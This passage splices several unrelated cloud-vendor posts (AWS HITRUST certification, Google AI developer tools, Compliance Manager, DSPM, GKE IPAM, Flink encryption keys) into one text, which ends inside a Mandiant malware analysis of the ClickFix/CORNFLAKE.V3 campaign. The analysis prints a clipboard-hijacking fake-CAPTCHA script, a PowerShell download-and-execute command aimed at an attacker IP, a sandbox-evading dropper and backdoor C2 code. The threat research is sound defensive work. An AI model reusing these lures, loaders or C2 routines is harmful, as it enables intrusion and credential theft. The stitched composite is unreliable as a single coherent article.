AWS Security Incident Response is now Health Information Trust Alliance Common Security Framework (HITRUST CSF) certified, demonstrating its alignment with stringent security and privacy requirements established by HITRUST for managing sensitive data. This certification validates that AWS Security Incident Response meets comprehensive security controls required by healthcare, life sciences and many other regulated sectors.
HITRUST CSF is a comprehensive security and privacy framework developed by the HITRUST Alliance to help organizations in the healthcare industry and other regulated sectors effectively manage information risk and comply with a variety of security, privacy and regulatory requirements. It provides a scalable, transparent, and certifiable approach based on well-known industry standards and regulations, allowing organizations to demonstrate their commitment to protecting sensitive data and meeting compliance obligations. AWS customers can achieve HITRUST certification using AWS products and inherit AWS HITRUST scores, reducing the audit burden for both parties. Visit the AWS Services in Scope by Compliance Program to see a full list of services also covered by HITRUST.
AWS Security Incident Response automates security alert monitoring, streamlines incident response coordination, and provides direct access to 24/7 security experts, enabling organizations to efficiently detect, investigate, and mitigate security incidents. To learn more, see the AWS Security Incident Response documentation. Get started today by visiting AWS Security Incident Response via the console, AWS Command Line Interface, or APIs.
Do you remember packing for an extended trip twenty years ago? We had to load up a camera, a day planner, a pile of books, a handheld gaming device, a map-stuffed tourist guide, a phone, a CD player, and maybe some cashier’s checks. Now? Just remember your smartphone!
This is an example of consolidation, but sometimes diversification happens. For example, it wasn’t long ago that your “computer” was simply a desktop PC that was your one device for everything. Now, we have laptops for portable work, tablets for casual digital consumption, smartphones for on-the-go internet, smart TVs for watching every type of content, and a myriad of gaming consoles.
This dynamic reminds me of the current state of developer tooling. Until recently, it was fairly static — UX design tools for mock-ups, IDEs to write code, build systems to assemble artifacts, systems and shell scripting to get infrastructure and apps deployed. It’s become wildly more diverse and dynamic thanks to generative AI. What we do, and what we use, will never be the same.
So when do I use what? Google alone offers LLM interfaces like the Gemini app and Google AI Studio, IDE extensions like Gemini Code Assist, browser-based dev environments like Firebase Studio, along with agentic services like Jules and the Gemini CLI. It’s easy to feel overwhelmed. Let’s break it down.
This diversification of tools is due, in part, to the new ways AI can assist us in software engineering.
We now have delegated, agentic options. Think of outsourcing the work to a third party where you provide detailed instructions, and only have limited interactions until the work is complete. The goal here is to get the work done quickly, and you aren’t focused on growing your own knowledge.
The next category is supervised, where you have AI acting more like someone who works for you. It’s more interactive, but you’re scaling by providing experience-based intent to an AI agent.
The final category is collaborative. Here, we’re in a conversational interaction with an AI assistant, going back and forth as we “learn” together.
Key takeaways for each AI developer tool
Jules is best for explicit instructions that can drive unattended batch work—add documentation, improve test coverage, perform surgical code modernizations—against source code in GitHub.com
No infrastructure or machinery to manage and update
Iterate with Jules on a plan before sending it off to do work
Get back a set of changes and a pull request to accept them
The Gemini CLI offers an open, fast, and flexible interface for working with code and content interactively or through delegation
Lightweight CLI tool that only requires a local install of Node
Many extensibility points including built-in tools along with support for MCP
Built into other tools like Gemini Code Assist and Firebase Studio
The open source Gemini CLI GitHub Actions are ideal for delegating background work to code repos—issue triage, pull request review—through async or user-initiated triggers
Comes with generous free usage limits for premier Gemini models. It supports enterprise access through Vertex AI models and also works with your Gemini Code Assist license.
Gemini Code Assist provides a rich IDE extension for conversational or agentic interactions with a codebase
Plug-in for Visual Studio Code and Jetbrains IDEs
Offers code completion, test generation, code explanation, and code generation
Extensibility through custom commands, tools support, and code customization on private codebases. Agent mode is powered by the Gemini CLI and enables more complex interactions
Free tier along with per-user-per-month pricing for teams
Firebase Studio is the right choice when you want to build professional-grade software without the need to be a professional developer, while working in a Google-managed and browser-based dev environment
Built-in templates for popular frameworks and languages to start your project
Let Gemini vibe code your app or dive into the code thanks to the full power of an underlying customizable VM
Configure the workspace environment using nix
No cost during preview, and more environments available for those who sign up for the Google Developer Program
Google AI Studio delivers the best way to interact with Google’s latest models, experiment with prompts, and vibe code lightweight web apps
Generate media, use the Live API for interactive sessions, and write prompts against Gemini and Gemma models
Write prompts, use tools, ground with Google Search, and run comparisons
Get API keys to call Gemini models programmatically
Generous free tier along with a paid tier offering higher rate limits, more features, and different data handling
Cheatsheet:
Choose the Gemini app for quick app prototyping
Choose Google AI Studio for prompt experimentation with specific models and capabilities.
Choose Gemini Code Assist for AI-assisted software development in your environment, with your preferred toolchain.
Choose Firebase Studio when you want to come to a fully Google-managed environment to prototype or vibe code beautiful software without needing to be a full-time software developer.
Choose the Gemini CLI when you’re working with a wide array of generative AI projects and want the speed and portability of an agentic CLI. And choose the Gemini CLI GitHub Actions when you want to use Google Cloud security and models while triggering interactive or background tasks for GitHub-based projects.
Choose Jules when you’ve got GitHub-based projects that need changes that can be clearly articulated in a set of instructions.
I haven’t seen software development tools change this much—or such an eager willingness to try anything new—at any time in my career. It’s exciting and confusing. It’s important to see these tools as complementary, and you’ll likely use a mix to accomplish your tasks. At Google, we’re going to continue to focus on giving you the best AI tools to build the best AI apps. Let us know how to make both experiences better!
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b73d340>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
As organizations increase their focus on security and regulatory compliance, Google Cloud is helping our customers meet these obligations by fostering better collaboration between security and compliance teams, and the wider organization they serve.
To help simplify and enhance how organizations manage security, privacy, and compliance in the cloud, we’re thrilled to announce that Google Cloud Compliance Manager is now available in preview. Integrated into Security Command Center, this new capability provides a unified platform for configuring, monitoring, and auditing security and compliance across your infrastructure, workloads, and data.
Our AI-powered approach to supporting security and compliance obligations automates monitoring, detection, and reporting, and can help reduce manual effort while improving accuracy.
The bidirectional ability to translate regulatory controls into service level configurations or technical controls, and technical controls into policies, is essential for mitigating IT risks and streamlining operations. The ability to understand and visualize this interrelation between regulations and technical guardrails can help organizations establish a unified perspective on security and compliance risks and their remediation.
Security and Compliance are interrelated.
Reducing risk with smarter compliance
Many organizations have security and compliance obligations that need to align with government, industry, and enterprise-specific requirements. Compliance Manager allows you to configure these obligations using simple yet customizable constructs, prevent misconfigurations, monitor drifts and generate evidence of conformance within the same product experience. It supports standard security and compliance benchmarks, while allowing for customization at multiple levels.
Compliance Manager is designed to address these industry needs by unifying the entire security and compliance journey into three phases: configure, monitor, and audit.
Configure: You can express and enforce your security, privacy, and compliance intent based on your needs and risk tolerance using Compliance Manager, which provides a comprehensive library of frameworks and cloud controls, addressing global security and compliance regulations across industries and sectors. You can deploy these in preventive, detective, and evidence generation modes at different granularities, including organization, folder, and projects. You can also customize standard frameworks, and create your own to meet specific organization policies and unique needs.
Monitor: To continuously monitor and generate reports against your intended posture, Compliance Manager provides near real-time visibility into your compliance status, enabling proactive identification and remediation of potential issues. You can view findings and risks, with customizable and downloadable reports.
Audit: Audit Manager helps you generate evidence of conformance to security, privacy, and compliance that can be used for internal and external audits. It can automate and simplify the audit process, help you assess workloads for compliance, gather required evidence, and provide comprehensive audit reports. The effectiveness of this audit evidence generation has been validated through our partnership with FedRAMP for the FedRAMP 20X initiative.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997bbd0df0>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Core constructs: Frameworks and CloudControls
Compliance Manager introduces Frameworks and CloudControls as two new platform components to express security, privacy, and compliance intent.
Frameworks are collections of technical controls that can also be mapped to regulatory controls. A framework can represent the following:
Industry-defined security and compliance standards such as CIS, CSA-CCM, SOC2, ISO 27001, NIST-800-53, FedRAMP-High, PCI-DSS, GDPR.
Google Cloud-defined security, privacy, and compliance best practices, including for AI security, data security, and cloud security.
Customer-defined collection of technical policies and controls representing company or industry best practices.
CloudControls are platform-agnostic building blocks that encapsulate the business logic for configuration (preventative mode), checks (detective mode), and evidence collection (audit mode). These controls support settings and checks for multiple resources and attributes, and can be parameterized for deployment time customizations. Customers can also write their own custom cloud controls.
Compliance Manager comes with a library of Frameworks and Cloud Controls, and we plan to add more as customer needs evolve. You can customize these framework templates or compose your own by selecting from the library Cloud Controls. You can also create custom Cloud Controls either manually or with help from Compliance Manager’s GenAI based control authoring feature, providing quick time to value.
How to get started
Compliance Manager can be accessed directly from the Compliance navigation link, located under Security in Google Cloud Console. Go to the Compliance Overview page to start using it.
Compliance Manager overview on Google Cloud Console.
We have more updates planned for Compliance Manager as we build out its robust capabilities. We value your input, and would love to incorporate your feedback into our product roadmap. You can contact us through your Google Cloud account team, or send us your feedback at compliance-manager-preview@google.com.
In the age of data democratization and generative AI, the way organizations handle data has changed dramatically. This evolution creates opportunities — and security risks. The challenge for security teams isn’t just about protecting data; it’s about scaling security and compliance to meet this new reality.
While traditional security controls are vital to risk mitigation, many data security posture management solutions lack the necessary capabilities that today’s organizations require. For example, an organization with AI workloads needs to make sure that sensitive data is not leaking into the training environment; that intellectual property such as models and weights are protected from exfiltration; and that all their models support “compliance explainability.”
There are four key concerns that organizations should understand for robust data security: where sensitive data resides, how it’s used, what controls can secure it, and the monitoring tools available to provide evidence for compliance. Our new Data Security Posture Management (DSPM) offering, now in preview, provides end-to-end governance for data security, privacy, and compliance.
DSPM capabilities include differentiating advanced data controls that match security, privacy, and compliance requirements and align with business needs. Available as part of Security Command Center, this Google Cloud-native solution can help reduce tooling complexity, and provides native platform experience.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3e997b6f5280>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
DSPM starts with a data map that offers a birds-eye view of data across your Google Cloud environment, its sensitivity level, and its default security posture. Discovery can help apply policies to monitor and secure their data, allowing curated controls to be matched with their sensitive data needs.
With Google Cloud DSPM, security and compliance teams can:
Discover data: DSPM provides comprehensive visibility into your data estate. It automatically discovers data assets across your Google Cloud environment and uses sensitivity labels from Sensitive Data Protection to help you understand what data you have and where it resides.
Assess risk: DSPM evaluates your current data security posture against Google Cloud’s recommended best practices, and can help identify potential vulnerabilities and misconfigurations.
Protect data: DSPM deploys data security frameworks by mapping security and compliance requirements to control policies, and can help you monitor them in near-real time.
Simplify compliance: DSPM can audit data against relevant compliance frameworks, help you pinpoint gaps, and generate detailed, evidence-backed compliance reports. DSPM can also help assess compliance with HIPAA, GDPR, and PCI DSS.
A visual overview of Google Cloud’s Data Security Posture Management solution.
How advanced DSPM controls help with security and compliance requirements
Security teams can get started by identifying sensitive data in their organization’s Google Cloud environment, and mapping desired security and compliance outcomes to specific data controls. To make this process easier, DSPM offers advanced controls, such as data access governance, flow governance, data protection, and data deletion controls to meet security and compliance outcomes.
Currently, these controls can be applied in detective mode on data boundaries, including organization, folder, and project. You can also use Google Cloud Sensitive Data Protection (SDP) to scan for specific types of sensitive data.
Applying advanced data controls to protect data.
Data access governance Using data access governance control, you can govern access to sensitive data, and restrict access in detective mode, to approved principals.
For example, an organization that needs governance around customer billing data can create a policy to allow only the fraud detection team to access sensitive customer billing information, and apply that control policy across sensitive data. Once applied, the policy will follow the data and surface any non-compliant access events.
Flow governance Using data flow control, you can restrict how data is moved across country boundaries in detective mode, to ensure that sensitive customer data is not moved outside a country boundary. As an example, let’s consider an organization with operations in a specific country that has a compliance requirement to not move customer data outside the country’s geographic boundary. With data flow governance, the organization can create a policy to only allow flow of data within that country, and apply that policy to sensitive data. Once applied, the control will surface any non-compliant read operations from outside the allowed geographic boundary.
Data protection Data protection controls can help manage the encryption key configuration, such as enforcing customer managed encryption keys (CMEK). You can create a policy to enforce CMEK as a policy on the keys protecting sensitive data.
Data deletion Using data deletion controls, you can manage the maximum duration that the data will be retained. You can create a policy with an allowed maximum retention period, and apply it to sensitive data.
Help shape the future of data security
We’re inviting security and compliance teams to be among the first to experience the power of Google Cloud DSPM. As part of the DSPM preview, organizations can:
Activate DSPM and begin evaluating its capabilities for specific business needs. For a detailed guide, please refer to the user guide.
Join the Technical Advisory Council and Customer Design Panels to provide valuable feedback that can influence DSPM development.
Work with Google Cloud experts to optimize their data security strategy and ensure a successful implementation.
For further questions, contact your Google Cloud account team, or or send us your feedback at dspm-pm@google.com.
Managing IP addresses in Kubernetes can be a complex and daunting task — but a crucial one. In Google Kubernetes Engine (GKE), it’s important that you manage IP addresses effectively, given the resource-constrained IPv4 address space. Sub-optimal configurations can lead to:
IP inefficiency: Poor utilization of the limited IPv4 address space
Complexity: Significant administrative overhead to plan and allocate IP addresses
Errors: Increased risk of hitting IP_SPACE_EXHAUSTED errors, which halt cluster scaling and application deployments
To help, we are pleased to announce the public preview of a new feature designed to simplify IP address management (IPAM) and improve IP efficiency in your GKE clusters: GKE auto IPAM.
Simplified and efficient IP management
GKE auto IPAM simplifies IPAM by dynamically allocating and/or de-allocating IP address ranges for nodes and pods as your cluster grows. This eliminates the need for large, potentially wasteful, upfront IP reservations and manual intervention during cluster scaling.
Benefits of GKE auto IPAM
Optimize resource allocation and enhance IP efficiency: Start with smaller IP ranges and let auto IPAM seamlessly expand them as needed, helping to ensure efficient utilization of your valuable IPv4 address space.
Scale with confidence and prevent IP exhaustion: Minimize your chances of running out of IPs. Auto IPAM proactively manages and dynamically allocates / deallocates addresses as your cluster grows, making it easy to scale.
Reduce administrative overhead: Simplify IPAM management with automated allocation and configuration, freeing up valuable time for your team — no manual intervention required.
Enable demanding workloads: Support resource-intensive applications that require rapid scaling by ensuring sufficient IP capacity is dynamically available on demand for growth and performance.
Getting started
This feature is compatible with both new and existing clusters running GKE version 1.33 or greater. Today, you can configure it with either gcloud CLI or API. Terraform and UI support is coming soon.
Updated cluster creation UI/UX
We’ve also overhauled the GKE cluster creation UI to make it simpler and more intuitive. The old interface buried critical IPAM settings deep in the cluster creation flow, making it difficult to discover, configure, and validate crucial network settings.Elevating IPAM and bringing it to the forefront provides a more intuitive and streamlined experience, so that you can easily and confidently define your network topology from the outset, for more robust and error-free cluster deployments.
IP address management made easy
GKE auto IPAM allows you to scale your clusters up and scale your clusters down on-demand, optimizing IP address resource allocation and reducing the administrative overhead of cluster operations. Try it today!
Amazon Managed Service for Apache Flink now supports Amazon Key Management Service (KMS) Customer Managed Keys (CMK). Amazon Managed Service for Apache Flink has always provided encryption by default using AWS-owned KMS keys. Now, customers have the option to use their own Customer Managed Keys providing greater control on how they can encrypt data stored in MSF.
Amazon Managed Service for Apache Flink simplifies the development and operation of real-time data stream processing applications by eliminating the complexity of managing Flink infrastructure. Apache Flink is an open source framework and engine for processing data streams.
For Amazon Managed Service for Apache Flink region availability, refer to the AWS Region Table.
For detailed information about implementing Customer Managed Keys in Amazon Managed Service for Apache Flink, visit our documentation.
Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the most intriguing compromises we are seeing in the wild right now, equipping our community to understand and respond to the most compelling threats we observe. This edition dissects an infection involving two threat groups, UNC5518 and UNC5774, leading to the deployment of CORNFLAKE.V3.
Introduction
Since June 2024, Mandiant Threat Defense has been tracking UNC5518, a financially motivated threat cluster compromising legitimate websites to serve fake CAPTCHA verification pages. This deceptive technique, known as ClickFix, lures website visitors into executing a downloader script which initiates a malware infection chain. UNC5518 appears to partner with clients or affiliates who use access obtained by the group to deploy additional malware.
While the initial compromise and fake CAPTCHA deployment are orchestrated by UNC5518, the payloads served belong to other threat groups. UNC5518 utilizes downloader scripts that function as an access-as-a-service. Several distinct threat actors have been observed leveraging the access provided by UNC5518, including:
UNC5774: A financially motivated group known to use CORNFLAKE backdoor to deploy a variety of subsequent payloads.
UNC4108: A threat cluster with unknown motivation, observed using PowerShell to deploy various tools like VOLTMARKER and NetSupport RAT, and conducting reconnaissance.
This blog post details a campaign where Mandiant identified UNC5518 deploying a downloader that delivers CORNFLAKE.V3 malware. Mandiant attributes the CORNFLAKE.V3 samples to UNC5774, a distinct financially motivated actor that uses UNC5518’s access-as-a-service operation as an entry vector into target environments.
The CORNFLAKE Family
CORNFLAKE.V3 is a backdoor, observed as two variants, written in JavaScript or PHP (PHP Variant) that retrieves payloads via HTTP. Supported payload types include shell commands, executables and dynamic link libraries (DLLs). Downloaded payloads are written to disk and executed. CORNFLAKE.V3 collects basic system information and sends it to a remote server via HTTP. CORNFLAKE.V3 has also been observed abusing Cloudflare Tunnels to proxy traffic to remote servers.
CORNFLAKE.V3 is an updated version of CORNFLAKE.V2, sharing a significant portion of its codebase. Unlike V2, which functioned solely as a downloader, V3 features host persistence via a registry Run key, and supports additional payload types.
The original CORNFLAKE malware differed significantly from later iterations, as it was written in C. This first variant functioned as a downloader, gathering basic system information and transmitting it via TCP to a remote server. Subsequently, it would download and execute a payload.
Malware Family
CORNFLAKE
CORNFLAKE.V2
CORNFLAKE.V3
Language
C
JS
JS or PHP
Type
Downloader
Downloader
Backdoor
C2 Communication
TCP socket (XOR encoded)
HTTP (XOR encoded)
HTTP (XOR encoded)
Payload types
DLL
DLL,EXE,JS,BAT
DLL,EXE,JS,BAT,PS
Persistence
No
No
Registry Run key
Table 1: Comparison of CORNFLAKE malware variants
Figure 1: The observed CORNFLAKE.V3 (Node.js) attack lifecycle
Initial Lead
Mandiant Threat Defense responded to suspicious PowerShell activity on a host resulting in the deployment of the CORNFLAKE.V3 backdoor.
Mandiant observed that a PowerShell script was executed via the Run command using the Windows+Rshortcut. Evidence of this activity was found in the HKEY_USERSUserSOFTWAREMicrosoftWindowsCurrentVersionExplorerRunMRU registry key, containing the following entry which resulted in the download and execution of the next payload:
Name: a
Value: powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1
The RunMRUregistry key stores the history of commands entered into the Windows Run (shortcut Windows+R) dialog box.
The execution of malicious scripts using the Windows+R shortcut is often indicative of users who have fallen victim to ClickFix lure pages. Users typically land on such pages as a result of benign browsing leading to interaction with search results that employ SEO poisoning or malicious ads.
Figure 2: Fake CAPTCHA verification (ClickFix) on an attacker-controlled webpage
As seen in the Figure 2, the user was lured into pasting a hidden script into the Windows Run dialog box which was automatically copied to the clipboard by the malicious web page when the user clicked on the image. The webpage accomplished this with the following JavaScript code:
// An image with the reCAPTCHA logo is displayed on the webpage
<div class="c" id="j">
<img src="https://www.gstatic[.]com/recaptcha/api2/logo_48.png"
alt="reCAPTCHA Logo">
<span>I'm not a robot</span>
</div>
// The malicious script is saved in variable _0xC
var _0xC = "powershell -w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"1";
// When the image is clicked, the script is copied to the clipboard
document.getElementById("j").onclick = function(){
var ta = document.createElement("textarea");
ta.value = _0xC;
document.body.appendChild(ta);
ta.select();
document.execCommand("copy");
The PowerShell command copied to clipboard is designed to download and execute a script from the remote server 138.199.161[.]141:8080/$u, where $uindicates the UNIX epoch timestamp of the download.
As a result, the PowerShell process connects to the aforementioned IP address and port with URL path 1742214432(UNIX epoch timestamp), as shown in the following HTTP GET request:
GET /1742214432 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US)
WindowsPowerShell/5.1.19041.5486
Host: 138.199.161[.]141:8080
Connection: Keep-Alive
The following PowerShell dropper script, similar to 1742214432, was recovered from a threat-actor controlled server during the investigation of a similar CORNFLAKE.V3 compromise:
# Get computer manufacturer for evasion check.
$Manufacturer = Get-WmiObject Win32_ComputerSystem | Select-Object
-ExpandProperty Manufacturer
# Exit if running in QEMU (VM detection).
if ($Manufacturer -eq "QEMU") {
exit 0;
}
# Get memory info for evasion check.
$TotalMemoryGb =
(Get-CimInstance Win32_ComputerSystem).TotalPhysicalMemory / 1GB
$AvailableMemoryGb =
(Get-CimInstance Win32_OperatingSystem).FreePhysicalMemory / 1MB
$UsedMemoryGb = $TotalMemoryGb - $AvailableMemoryGb
# Exit if total memory is low or calculated "used" memory is low
(possible sandbox detection).
if ($TotalMemoryGb -lt 4 -or $UsedMemoryGb -lt 1.5) {
exit 0
}
# Exit if computer name matches default pattern
(possible sandbox detection).
if ($env:COMPUTERNAME -match "DESKTOP-S*") {
exit 0
}
# Pause execution briefly.
sleep 1
# Define download URL (defanged).
$ZipURL = "hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip"
# Define destination folder (AppData).
$DestinationFolder = [System.IO.Path]::Combine($env:APPDATA, "")
# Define temporary file path for download.
$ZipFile = [System.IO.Path]::Combine($env:TEMP, "downloaded.zip")
# Download the Node.js zip file.
iwr -Uri $ZipURL -OutFile $ZipFile
# Try block for file extraction using COM objects.
try {
$Shell = New-Object -ComObject Shell.Application
$ZIP = $Shell.NameSpace($ZipFile)
$Destination = $Shell.NameSpace($DestinationFolder)
# Copy/extract contents silently.
$Destination.CopyHere($ZIP.Items(), 20)
}
# Exit on any extraction error.
catch {
exit 0
}
# Update destination path to the extracted Node.js folder.
$DestinationFolder = [System.IO.Path]::Combine($DestinationFolder,
"node-v22.11.0-win-x64")
# Base64 encoded payload (large blob containing the CORNFLAKE.V3 sample).
$BASE64STRING =<Base-64 encoded CORNFLAKE.V3 sample>
# Decode the Base64 string.
$BINARYDATA = [Convert]::FromBase64String($BASE64STRING)
# Convert decoded bytes to a string (the payload code).
$StringData = [System.Text.Encoding]::UTF8.GetString($BINARYDATA)
# Path to the extracted node.exe.
$Node = [System.IO.Path]::Combine($DestinationFolder, "node.exe")
# Start node.exe to execute the decoded string data as JavaScript, hidden.
start-process -FilePath "$Node" -ArgumentList "-e `"$StringData`""
-WindowStyle Hidden
The PowerShell dropper’s execution includes multiple steps:
Check if it is running inside a virtual machine and, if true, exit
Download Node.js via HTTPS from the URL hxxps://nodejs[.]org/dist/v22.11.0/node-v22.11.0-win-x64.zip, write the file to %TEMP%downloaded.zip and extract its contents to the directory %APPDATA%node-v22.11.0-win-x64
Base64 decode its embedded CORNFLAKE.V3 payload and execute it via the command %APPDATA%node-v22.11.0-win-x64node.exe -e “<base64_decoded_CORNFLAKE.v3>”
The PowerShell dropper’s anti-vm checks include checking for low system resources (total memory less than 4GB or used memory less than 1.5GB) and if the target system’s computer name matches the regular expression DESKTOP-S* or the target system’s manufacturer is QEMU.
As a result of the dropper’s execution, a DNS query for the nodejs[.]org domain was made, followed by the download of an archive named downloaded.zip (MD5:e033f9800a5ba44b23b3026cf1c38c72). This archive contained the Node.js runtime environment, including its executable file node.exe, which was then extracted to %APPDATA%node-v22.11.0-win-x64. The Node.js environment allows for the execution of JavaScript code outside of a web browser.
The extracted %APPDATA%node-v22.11.0-win-x64node.exe binary was then launched by Powershell with the -e argument, followed by a large Node.js script, a CORNFLAKE.V3 backdoor sample.
Mandiant identified the following activities originating from the CORNFLAKE.V3 sample:
Host and AD-based reconnaissance
Persistence via Registry Run key
Credential harvesting attempts via Kerberoasting
The following process tree was observed during the investigation:
explorer.exe
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-w h -c
"$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band
0xfffffffffffffff0;irm 138.199.161[.]141:8080/$u|iex"
↳ c:users<user>appdataroamingnode-v22.11.0-win-x64node.exe
-e "{CORNFLAKE.V3}"
↳ c:windowssystem32windowspowershellv1.0powershell.exe
-c "{Initial check and System Information Collection}"
↳ C:WindowsSystem32ARP.EXE -a
↳ C:WindowsSystem32chcp.com 65001
↳ C:WindowsSystem32systeminfo.exe
↳ C:WindowsSystem32tasklist.exe /svc
↳ c:windowssystem32cmd.exe /d /s /c "wmic process where
processid=16004 get commandline"
↳ C:WindowsSystem32cmd.exe /d /s /c "{Kerberoasting}"
↳ c:windowssystem32cmd.exe /d /s /c
"{Active Directory Reconnaissance}"
↳ c:windowssystem32cmd.exe /d /s /c "reg add
{ChromeUpdater as Persistence}"
Analysis of CORNFLAKE.V3
The CORNFLAKE.V3 sample recovered in our investigation was completely unobfuscated, which allowed us to statically analyze it in order to understand its functionality. This section describes the primary functions of the malware.
When the script initially executes, a check verifies the command line arguments of the node.exeprocess, keeping in mind that the binary is initially spawned with a single argument (the script itself), this check forces the script to create a child process which has1 as an additional argument, then the initial node.exe exits. When the child process runs, since it now has three arguments, it will pass this initial check and execute the rest of the script.
This check allows the malware to ensure that only one instance of the script is executing at one time, even if it is launched multiple times due to its persistence mechanisms.
Following this, the malware attempts to collect system information using the following code:
This code block executes a series of PowerShell commands (or fallback CMD commands if PowerShell fails) using execSync. It gathers the script’s version, user privilege level (System, Admin, User), standard systeminfo output, running tasks/services (tasklist /svc), service details (Get-Service), available drives (Get-PSDrive), and the ARP table (arp -a).
C2 Initialization
After setting some logical constants and the command and control (C2) server IP address, the malware enters the mainloopfunction. The script contains support for two separate lists, hosts and hostsIP, which are both used in the C2 communication logic. Initially, the mainloop function attempts to connect to a random host in thehosts list, however, if unable to do so, it will attempt to connect to a random IP address in the hostsIP list instead. Once a connection is successfully established, the mainfunction is called.
// Define lists of hostnames and IP addresses for the command
and control server.
const hosts = ['159.69.3[.]151'];
const hostsIp = ['159.69.3[.]151'];
// Variables to manage the connection and retry logic.
let useIp = 0;
let delay = 1;
// Main loop to continuously communicate with the command
and control server.
async function mainloop() {
let toHost = hosts[Math.floor(Math.random() * 1000) % hosts.length];
let toIp = hostsIp[Math.floor(Math.random() * 1000) % hostsIp.length];
while (true) {
// Wait for the specified delay.
await new Promise((resolve) => setTimeout(resolve, delay));
try {
// Attempt to communicate with the command and control server.
if (useIp < 200) {
await main(toHost, PORT_IP);
useIp = 0;
} else {
await main(toIp, PORT_IP);
useIp++;
if (useIp >= 210) useIp = 0;
}
} catch (error) {
// Handle errors during communication.
console.error('Error with HTTP request:', error.message);
toHost = hosts[Math.floor(Math.random() * 1000) %
hosts.length];
toIp = hostsIp[Math.floor(Math.random() * 1000) %
hostsIp.length];
useIp++;
delay = 1000 * 10;
continue;
}
// Set the delay for the next attempt.
delay = 1000 * 60 * 5;
}
}
C2 Communication
This function, named main, handles the main command and control logic. It takes a host and port number as arguments, and constructs the data to be sent to the C2 server. The malware sends an initial POST request to the path /init1234, which contains information about the infected system and the output of the last executed command; the contents of this request are XOR-encrypted by the enc function.
This request is answered by the C2 with 2 possible responses:
ooff – the process exits
atst – the atst function is called, which establishes persistence on the host
If the response does not match one of the aforementioned 2 values, the malware interprets the response as a payload and parses the last byte of the response after XOR decrypting it. The following values are accepted by the program:
Command
Type
Description
0
EXE
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.exe and launched using the Node.js child_process.spawn()function.
1
DLL
The received payload is written to %APPDATA%<random_8_chars><random_8_chars>.dll and launched using the Node.js child_process.spawn()function as an argument to rundll32.exe.
2
JS
The received payload is launched from memory as an argument to node.exe using the Node.js child_process.spawn()function.
3
CMD
The received payload is launched from memory as an argument to cmd.exeusing the Node.js child_process.spawn()function. Additionally, the output is saved in the LastCmd variable and sent to the C2 in the next request.
4
Other
The payload is written to %APPDATA%<random_8_chars><random_8_chars>.log.
Table 2: CORNFLAKE.V3 supported payloads
Persistence
The atst function, called by main, attempts to establish persistence on the host by creating a new registry Run key named ChromeUpdaterunder HKCUSoftwareMicrosoftWindowsCurrentVersionRun.
The malware uses wmic.exe to obtain the command line arguments of the currently running node.exe process. If node.exe was launched with the -e argument, like the malware does initially, the script extracts the argument after -e, which contains the full malicious script. This script is written to the <random_8_chars>.log file in the Node.js installation directory and its path is saved to the path2file variable.
If node.exe was instead launched with a file as an argument (such as during the persistence phase), the path to this file is extracted and saved to the path2file variable.
The path2file variable is then set as an argument tonode.exe in the newly created ChromeUpdater registry key. This ensures that the malware executes upon user logon.
Executed Payloads
As observed in the main function, this sample can receive and execute different types of payloads from its C2 server. This section describes two payloads that were observed in our investigation.
Active Directory Reconnaissance
The first payload observed on the host was a batch script containing reconnaissance commands. The script initially determines if the host is domain-joined, this condition determines which specific reconnaissance type is executed.
Domain Joined
Query Active Directory Computer Count: Attempts to connect to Active Directory and count the total number of computer objects registered in the domain.
Display Detailed User Context: Executeswhoami /all to reveal the current user’s Security Identifier (SID), domain and local group memberships, and assigned security privileges.
Enumerate Domain Trusts: Executes nltest /domain_trusts to list all domains that the current computer’s domain has trust relationships with (both incoming and outgoing).
List Domain Controllers: Executes nltest /dclist : to find and list the available Domain Controllers (DCs) for the computer’s current domain.
Query Service Principal Names (SPNs): Executes setspn -T <UserDomain> -Q */*to query for all SPNs registered in the user’s logon domain, then filters the results (Select-String) to specifically highlight SPNs potentially associated with user accounts (lines starting CN=…Users).
Not Domain Joined
Enumerate Local Groups: Uses Get-LocalGroup to list all security groups defined locally on the machine.
Enumerate Local Group Members: For each local group found, uses Get-LocalGroupMember to list the accounts (users or other groups) that are members of that group, displaying their Name and PrincipalSource (e.g., Local, MicrosoftAccount).
Kerberoasting
The second script executed is a batch script which attempts to harvest credentials via Kerberoasting. The script queries Active Directory for user accounts configured with SPNs (often an indication of a service account using user credentials). For each of these, it requests a Kerberos service ticket from which a password hash is extracted and formatted. These hashes are exfiltrated to the C2 server, where the attacker can attempt to crack them.
Mandiant Threat Defense recently observed a new PHP-based CORNFLAKE.V3 variant which has similar functionality to the previous Node.js based iterations.
This version was dropped by an in-memory script which was executed as a result of interaction with a malicious ClickFix lure page.
The script downloads the PHP package from windows.php[.]net,writes it to disk as php.zipand extracts its contents to the C:Users<User>AppDataRoamingphpdirectory. The CORNFLAKE.V3 PHP sample is contained in theconfig.cfg file that was also dropped in the same directory and executed with the following command line arguments:
To maintain persistence on the host, this variant utilizes a registry Run key named after a randomly chosen directory in %APPDATA% or %LOCALAPPDATA% instead of the fixed ChromeUpdater string used in the Node.js version. To communicate with its C2 a unique path is generated for each request, unlike the static/init1234 path:
POST /ue/2&290cd148ed2f4995f099b7370437509b/fTqvlt HTTP/1.1
Host: varying-rentals-calgary-predict.trycloudflare[.]com
Connection: close
Content-Length: 39185
Content-type: application/octet-stream
Much like the Node.js version, the last byte of the received payload determines the payload type, however, these values differ in the PHP version:
Command
Type
Notes
